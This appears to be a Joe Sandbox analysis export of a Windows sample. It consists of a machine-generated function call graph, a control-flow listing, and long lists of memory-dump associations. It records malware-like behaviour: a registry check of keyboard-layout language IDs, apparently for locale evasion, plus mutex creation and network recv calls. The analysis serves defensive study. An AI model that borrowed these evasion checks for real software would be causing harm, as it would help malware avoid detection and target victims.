__Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11386->11388 11390 263c38 11386->11390 11387->11390 11388->11384 11389 2632d0 5 API calls 11391 263c5f 11389->11391 11390->11389 11390->11391 11391->11384 11671 2677b0 11672 2677f1 shared_ptr 11671->11672 11673 265c10 3 API calls 11672->11673 11675 267883 shared_ptr 11672->11675 11673->11675 11674 265c10 3 API calls 11677 2679e3 11674->11677 11675->11674 11676 267953 shared_ptr std::invalid_argument::invalid_argument 11675->11676 11678 265c10 3 API calls 11677->11678 11680 267a15 shared_ptr 11678->11680 11679 267aa5 shared_ptr std::invalid_argument::invalid_argument 11680->11679 11681 266d70 RtlAllocateHeap 11680->11681 11682 267b1b shared_ptr 11681->11682 11683 265c10 3 API calls 11682->11683 11687 267be3 shared_ptr ___std_exception_copy 11682->11687 11684 267b7d 11683->11684 11685 265c10 3 API calls 11684->11685 11686 267ba0 11685->11686 11688 265c10 3 API calls 11686->11688 11689 265c10 3 API calls 11687->11689 11714 267cf4 shared_ptr std::invalid_argument::invalid_argument 11687->11714 11688->11687 11690 267dd2 11689->11690 11691 265c10 3 API calls 11690->11691 11693 267dff shared_ptr 11691->11693 11692 267ed3 GetNativeSystemInfo 11694 267ed7 11692->11694 11693->11692 11693->11694 11695 267fb1 ___std_exception_copy 11693->11695 11696 267f3f 11694->11696 11697 268019 11694->11697 11694->11714 11703 265c10 3 API calls 11695->11703 11695->11714 11699 265c10 3 API calls 11696->11699 11698 265c10 3 API calls 11697->11698 11700 26804c 11698->11700 11701 267f67 11699->11701 11702 265c10 3 API calls 11700->11702 11704 265c10 3 API calls 11701->11704 11707 26806b 11702->11707 11705 268427 11703->11705 11706 267f86 11704->11706 11708 265c10 3 API calls 11705->11708 11709 298bbe RtlAllocateHeap 11706->11709 11710 265c10 3 API calls 11707->11710 11708->11714 11709->11695 11711 2680a3 11710->11711 11712 265c10 3 API calls 11711->11712 11713 2680f4 11712->11713 11715 265c10 3 API calls 11713->11715 11716 268113 11715->11716 11717 265c10 3 API calls 11716->11717 11718 26814b 11717->11718 11719 265c10 3 API calls 11718->11719 11720 26819c 11719->11720 11721 265c10 3 API calls 11720->11721 11722 2681bb 11721->11722 11723 265c10 3 API calls 11722->11723 11724 2681f3 11723->11724 11725 265c10 3 API calls 11724->11725 11726 268244 11725->11726 11727 265c10 3 API calls 11726->11727 11728 268263 11727->11728 11729 265c10 3 API calls 11728->11729 11729->11714 11730 2687b0 11731 2687b6 11730->11731 11732 2687b8 GetFileAttributesA 11730->11732 11731->11732 11733 2687c4 11732->11733 11734 2747b0 11736 274eed 11734->11736 11735 274f59 shared_ptr std::invalid_argument::invalid_argument 11736->11735 11737 267d30 4 API calls 11736->11737 11738 2750ed 11737->11738 11773 268380 11738->11773 11740 275106 11741 265c10 3 API calls 11740->11741 11742 275155 11741->11742 11743 265c10 3 API calls 11742->11743 11744 275171 11743->11744 11779 269a00 11744->11779 11774 2683e5 ___std_exception_copy 11773->11774 11775 265c10 3 API calls 11774->11775 11778 268403 shared_ptr std::invalid_argument::invalid_argument 11774->11778 11776 268427 11775->11776 11777 265c10 3 API calls 11776->11777 11777->11778 11778->11740 11780 269a3f 11779->11780 11781 265c10 3 API calls 11780->11781 11782 269a47 11781->11782 11783 268b30 3 API calls 11782->11783 11784 269a58 11783->11784 11396 269ab8 11398 269acc 11396->11398 11399 269b08 11398->11399 11400 265c10 3 API calls 11399->11400 11401 269b7c 11400->11401 11408 268b30 11401->11408 11403 269b8d 11404 265c10 3 API calls 11403->11404 11405 269cb1 11404->11405 11406 268b30 3 API calls 11405->11406 11407 269cc2 11406->11407 11409 268b7c 11408->11409 11410 265c10 3 API calls 11409->11410 11411 268b97 shared_ptr std::invalid_argument::invalid_argument 11410->11411 11411->11403 10635 265c83 10637 265c91 shared_ptr ___std_exception_copy 10635->10637 10636 265d17 shared_ptr std::invalid_argument::invalid_argument 10637->10636 10638 265da7 RegOpenKeyExA 10637->10638 10639 265e00 RegCloseKey 10638->10639 10640 265e26 10639->10640 10641 265ea6 shared_ptr std::invalid_argument::invalid_argument 10640->10641 10642 265c10 3 API calls 10640->10642 10643 2666ac 10642->10643 10644 265c10 3 API calls 10643->10644 10645 2666b1 shared_ptr 10644->10645 10646 265c10 3 API calls 10645->10646 10649 266852 shared_ptr std::invalid_argument::invalid_argument 10645->10649 10648 26673d shared_ptr 10646->10648 10647 265c10 3 API calls 10647->10648 10648->10647 10648->10649 11200 268980 11202 268aea 11200->11202 11203 2689d8 shared_ptr 11200->11203 11201 265c10 3 API calls 11201->11203 11203->11201 11203->11202 10930 263c8e 10931 263c98 10930->10931 10933 263ca5 10931->10933 10934 262410 10931->10934 10935 262424 10934->10935 10938 27b52d 10935->10938 10946 293aed 10938->10946 10941 27b5a5 ___std_exception_copy 10953 27b1ad 10941->10953 10942 27b598 10949 27af56 10942->10949 10945 26242a 10945->10933 10957 294f29 10946->10957 10948 27b555 10948->10941 10948->10942 10948->10945 10950 27af9f ___std_exception_copy 10949->10950 10952 27afb2 shared_ptr 10950->10952 10961 27b39f 10950->10961 10952->10945 10954 27b1d8 10953->10954 10956 27b1e1 shared_ptr 10953->10956 10955 27b39f InitOnceExecuteOnce 10954->10955 10955->10956 10956->10945 10959 294f2e ___std_exception_copy 10957->10959 10958 2965ed 3 API calls 10960 298c2f 10958->10960 10959->10948 10959->10958 10962 27bedf InitOnceExecuteOnce 10961->10962 10964 27b3e1 10962->10964 10963 27b3e8 10963->10952 10964->10963 10965 27bedf InitOnceExecuteOnce 10964->10965 10966 27b461 10965->10966 10966->10952 11801 262b90 11802 262bce 11801->11802 11803 27b7fb TpReleaseWork 11802->11803 11804 262bdb shared_ptr std::invalid_argument::invalid_argument 11803->11804 11805 263f9f 11806 263fad 11805->11806 11808 263fb6 11805->11808 11807 262410 4 API calls 11806->11807 11807->11808 11825 263fe0 11826 264022 11825->11826 11827 2640d2 11826->11827 11828 26408c 11826->11828 11831 264035 std::invalid_argument::invalid_argument 11826->11831 11829 263ee0 3 API calls 11827->11829 11832 2635e0 11828->11832 11829->11831 11833 263616 11832->11833 11837 26364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 11833->11837 11838 262ce0 11833->11838 11835 26369e 11836 262c00 3 API calls 11835->11836 11835->11837 11836->11837 11837->11831 11839 262d1d 11838->11839 11840 27bedf InitOnceExecuteOnce 11839->11840 11841 262d46 11840->11841 11843 262d51 std::invalid_argument::invalid_argument 11841->11843 11844 27bef7 11841->11844 11843->11835 11845 27bf03 Concurrency::cancel_current_task 11844->11845 11846 27bf73 11845->11846 11847 27bf6a 11845->11847 11849 262ae0 InitOnceExecuteOnce 11846->11849 11851 27be7f 11847->11851 11850 27bf6f 11849->11850 11850->11843 11852 27cc31 InitOnceExecuteOnce 11851->11852 11853 27be97 11852->11853 11853->11850 11232 26a9f4 11243 269230 11232->11243 11234 26aa03 shared_ptr 11235 265c10 3 API calls 11234->11235 11241 26aab3 shared_ptr 11234->11241 11236 26aa65 11235->11236 11237 265c10 3 API calls 11236->11237 11238 26aa8d 11237->11238 11239 265c10 3 API calls 11238->11239 11239->11241 11240 298ab6 RtlAllocateHeap 11240->11241 11241->11240 11242 26ad3c shared_ptr std::invalid_argument::invalid_argument 11241->11242 11246 269284 shared_ptr 11243->11246 11244 265c10 3 API calls 11244->11246 11245 269543 shared_ptr std::invalid_argument::invalid_argument 11245->11234 11246->11244 11251 26944f shared_ptr 11246->11251 11247 265c10 3 API calls 11247->11251 11248 2698b5 shared_ptr std::invalid_argument::invalid_argument 11248->11234 11249 26979f shared_ptr 11249->11248 11250 265c10 3 API calls 11249->11250 11252 269927 shared_ptr std::invalid_argument::invalid_argument 11250->11252 11251->11245 11251->11247 11251->11249 11252->11234 11002 2620c0 11003 27c68b __Mtx_init_in_situ 2 API calls 11002->11003 11004 2620cc 11003->11004 11005 27d64e RtlAllocateHeap 11004->11005 11006 2620d6 11005->11006 11011 26e0c0 recv 11012 26e122 recv 11011->11012 11013 26e157 recv 11012->11013 11015 26e191 11013->11015 11014 26e2b3 std::invalid_argument::invalid_argument 11015->11014 11016 27c6ac GetSystemTimePreciseAsFileTime 11015->11016 11017 26e2ee 11016->11017 11018 27c26a 4 API calls 11017->11018 11019 26e358 11018->11019 11870 2787d0 11871 27882a ___std_exception_copy 11870->11871 11877 279bb0 11871->11877 11874 27886c std::invalid_argument::invalid_argument 11876 2788d9 std::_Throw_future_error 11887 279ef0 11877->11887 11879 279be5 11880 262ce0 InitOnceExecuteOnce 11879->11880 11881 279c16 11880->11881 11891 279f70 11881->11891 11883 278854 11883->11874 11884 2643f0 11883->11884 11885 27bedf InitOnceExecuteOnce 11884->11885 11886 26440a 11885->11886 11886->11876 11888 279f0c 11887->11888 11889 27c68b __Mtx_init_in_situ 2 API calls 11888->11889 11890 279f17 11889->11890 11890->11879 11892 279fef shared_ptr 11891->11892 11894 27a058 11892->11894 11896 27a210 11892->11896 11895 27a03b 11895->11883 11897 27a290 11896->11897 11903 2771d0 11897->11903 11899 27a4be shared_ptr 11899->11895 11900 27a2cc shared_ptr 11900->11899 11901 263ee0 3 API calls 11900->11901 11902 27a4a6 11901->11902 11902->11895 11904 277211 11903->11904 11911 263970 11904->11911 11906 277446 std::invalid_argument::invalid_argument 11906->11900 11907 2772ad ___std_exception_copy 11907->11906 11908 27c68b __Mtx_init_in_situ 2 API calls 11907->11908 11909 277401 11908->11909 11916 262ec0 11909->11916 11912 27c68b __Mtx_init_in_situ 2 API calls 11911->11912 11913 2639a7 11912->11913 11914 27c68b __Mtx_init_in_situ 2 API calls 11913->11914 11915 2639e6 11914->11915 11915->11907 11917 262f06 11916->11917 11921 262f6f 11916->11921 11918 27c6ac GetSystemTimePreciseAsFileTime 11917->11918 11919 262f12 11918->11919 11922 26301e 11919->11922 11926 262f1d __Mtx_unlock 11919->11926 11920 262fef 11920->11906 11921->11920 11927 27c6ac GetSystemTimePreciseAsFileTime 11921->11927 11923 27c26a 4 API calls 11922->11923 11924 263024 11923->11924 11925 27c26a 4 API calls 11924->11925 11928 262fb9 11925->11928 11926->11921 11926->11924 11927->11928 11929 27c26a 4 API calls 11928->11929 11930 262fc0 __Mtx_unlock 11928->11930 11929->11930 11931 27c26a 4 API calls 11930->11931 11932 262fd8 __Cnd_broadcast 11930->11932 11931->11932 11932->11920 11933 27c26a 4 API calls 11932->11933 11934 26303c 11933->11934 11935 27c6ac GetSystemTimePreciseAsFileTime 11934->11935 11945 263080 shared_ptr __Mtx_unlock 11935->11945 11936 2631c5 11937 27c26a 4 API calls 11936->11937 11938 2631cb 11937->11938 11939 27c26a 4 API calls 11938->11939 11940 2631d1 11939->11940 11941 27c26a 4 API calls 11940->11941 11947 263193 __Mtx_unlock 11941->11947 11942 2631a7 std::invalid_argument::invalid_argument 11942->11906 11943 27c26a 4 API calls 11944 2631dd 11943->11944 11945->11936 11945->11938 11945->11942 11946 27c6ac GetSystemTimePreciseAsFileTime 11945->11946 11948 26315f 11946->11948 11947->11942 11947->11943 11948->11936 11948->11940 11948->11947 11949 27bd4c GetSystemTimePreciseAsFileTime 11948->11949 11949->11948 11465 269adc 11466 269aea 11465->11466 11470 269afe shared_ptr 11465->11470 11467 26a917 11466->11467 11466->11470 11468 26a953 Sleep CreateMutexA 11467->11468 11469 26a98e 11468->11469 11471 265c10 3 API calls 11470->11471 11472 269b7c 11471->11472 11473 268b30 3 API calls 11472->11473 11474 269b8d 11473->11474 11475 265c10 3 API calls 11474->11475 11476 269cb1 11475->11476 11477 268b30 3 API calls 11476->11477 11478 269cc2 11477->11478

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 00265C83 Relevance: 26.0, APIs: 3, Strings: 11, Instructions: 1535registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 0 265c83-265c8f 1 265ca5-265cf7 call 27d663 0->1 2 265c91-265c9f 0->2 12 265d21-265d3c call 27cff1 1->12 13 265cf9-265d05 1->13 2->1 3 265d3d 2->3 5 265d42-265e23 call 296c6a call 2940f0 RegOpenKeyExA RegCloseKey 3->5 6 265d3d call 296c6a 3->6 24 265e26-265e2b 5->24 6->5 15 265d17-265d1e call 27d663 13->15 16 265d07-265d15 13->16 15->12 16->5 16->15 24->24 25 265e2d-265e86 call 2780c0 24->25 29 265eb0-265ecc call 27cff1 25->29 30 265e88-265e94 25->30 31 265ea6-265ead call 27d663 30->31 32 265e96-265ea4 30->32 31->29 32->31 34 265ecd-265fde call 296c6a 32->34 45 265fe0-265fec 34->45 46 266008-266015 call 27cff1 34->46 47 265ffe-266005 call 27d663 45->47 48 265fee-265ffc 45->48 47->46 48->47 50 266016-26658e call 296c6a call 27e150 call 2780c0 * 5 48->50 74 266590-26659f 50->74 75 2665bb-2665d6 call 27cff1 50->75 76 2665b1-2665b8 call 27d663 74->76 77 2665a1-2665af 74->77 76->75 77->76 79 2665d7-2666b8 call 296c6a call 277a00 call 265c10 77->79 95 2666bc-2666db call 2622c0 79->95 96 2666ba 79->96 99 26670c-266712 95->99 100 2666dd-2666ec 95->100 96->95 103 266715-26671a 99->103 101 266702-266709 call 27d663 100->101 102 2666ee-2666fc 100->102 101->99 102->101 104 266937 call 296c6a 102->104 103->103 106 26671c-266744 call 277a00 call 265c10 103->106 110 26693c call 296c6a 104->110 116 266746 106->116 117 266748-266769 call 2622c0 106->117 114 266941-266d6f call 296c6a call 278200 call 296c6a 110->114 116->117 124 26679a-2667ae 117->124 125 26676b-26677a 117->125 134 2667b4-2667ba 124->134 135 266858-26687c 124->135 127 266790-266797 call 27d663 125->127 128 26677c-26678a 125->128 127->124 128->110 128->127 138 2667c0-2667ed call 277a00 call 265c10 134->138 136 266880-266885 135->136 136->136 139 266887-2668ec call 2780c0 * 2 136->139 152 2667f1-266818 call 2622c0 138->152 153 2667ef 138->153 150 2668ee-2668fd 139->150 151 266919-266936 call 27cff1 139->151 154 26690f-266916 call 27d663 150->154 155 2668ff-26690d 150->155 162 26681a-266829 152->162 163 266849-26684c 152->163 153->152 154->151 155->114 155->154 164 26683f-266846 call 27d663 162->164 165 26682b-266839 162->165 163->138 166 266852 163->166 164->163 165->104 165->164 166->135
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,c13L,4C333163), ref: 00265DCC
                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(c13L,?,00000000,00000000,?,00000400,?,?,00000000,00000001,c13L,4C333163), ref: 00265DFA
                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(c13L,?,?,00000000,00000001,c13L,4C333163), ref: 00265E06
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                          • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$VUUU$c13L$c13L$c13L$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                          • API String ID: 3677997916-3570576523
                                                                                                                                                                                                                                          • Opcode ID: 90d5a8902eb93a936b1588c38eb5957eeb8fcb017875500416698c098b383ed9
                                                                                                                                                                                                                                          • Instruction ID: 87e6b818d1e5619962e4f3254a2691660af9560eacfe081202478a57da9767a5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90d5a8902eb93a936b1588c38eb5957eeb8fcb017875500416698c098b383ed9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9C20571A202189BDF28DF68CC89BDDB779EF45304F508299E409A72C1DB759AE4CF90
                                                                                                                                                                                                                                          Function 0026735A Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 1031COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
